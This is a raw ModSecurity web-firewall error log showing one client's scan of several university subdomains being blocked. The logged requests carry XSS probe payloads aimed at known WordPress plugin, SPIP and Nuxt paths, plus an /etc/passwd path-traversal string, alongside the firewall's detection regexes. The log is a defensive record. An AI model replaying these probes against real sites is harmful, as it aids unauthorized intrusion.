[Tue Aug 29 11:54:30.778973 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16BsCo-f0AAApZHV8AAAAf"]
[Tue Aug 29 11:54:31.541385 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAApZHWAAAAAf"]
[Tue Aug 29 11:54:31.548563 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAofnD0AAAAX"]
[Tue Aug 29 11:54:31.548932 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAqWwV8AAAAl"]
[Tue Aug 29 11:54:31.557655 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAoz77AAAAAS"]
[Tue Aug 29 11:54:31.661239 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAApk-VsAAAAn"]
[Tue Aug 29 11:54:31.662361 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApmXvQAAAAp"]
[Tue Aug 29 11:54:31.667652 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqSwiUAAAAN"]
[Tue Aug 29 11:54:31.668020 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqXyPUAAAAq"]
[Tue Aug 29 11:54:31.670350 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqci6QAAAAv"]
[Tue Aug 29 11:54:31.873538 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApbUU0AAAAh"]
[Tue Aug 29 11:54:32.531297 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16CMCo-f0AAAqWwWMAAAAl"]
[Tue Aug 29 11:54:32.566909 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqb-p4AAAAu"]
[Tue Aug 29 11:54:32.671488 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAnHQyUAAAAT"]
[Tue Aug 29 11:54:32.699646 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqUB2IAAAAb"]
[Tue Aug 29 11:54:32.929309 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqdblwAAAAw"]
[Tue Aug 29 11:54:32.967455 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqeFOoAAAAx"]
[Tue Aug 29 11:54:33.531963 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqUB2QAAAAb"]
[Tue Aug 29 11:54:33.551677 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAApmXvcAAAAp"]
[Tue Aug 29 11:54:33.553707 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqZuZQAAAAs"]
[Tue Aug 29 11:54:33.556220 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqQ@t0AAAAB"]
[Tue Aug 29 11:54:33.562984 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CcCo-f0AAAqb-qAAAAAu"]
[Tue Aug 29 11:54:33.614677 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqWwWcAAAAl"]
[Tue Aug 29 11:54:33.782713 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAofnEEAAAAX"]
[Tue Aug 29 11:54:34.561555 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAApZHWcAAAAf"]
[Tue Aug 29 11:54:34.580464 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAoz77YAAAAS"]
[Tue Aug 29 11:54:34.586802 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAApKax8AAAAZ"]
[Tue Aug 29 11:54:34.601373 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAAqTvjkAAAAa"]
[Tue Aug 29 11:54:34.602306 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqRzCwAAAAM"]
[Tue Aug 29 11:54:34.602500 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqci6sAAAAv"]
[Tue Aug 29 11:54:34.603701 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAApXgfgAAAAU"]
[Tue Aug 29 11:54:34.608181 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqdbmEAAAAw"]
[Tue Aug 29 11:54:34.608729 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAAoz77cAAAAS"]
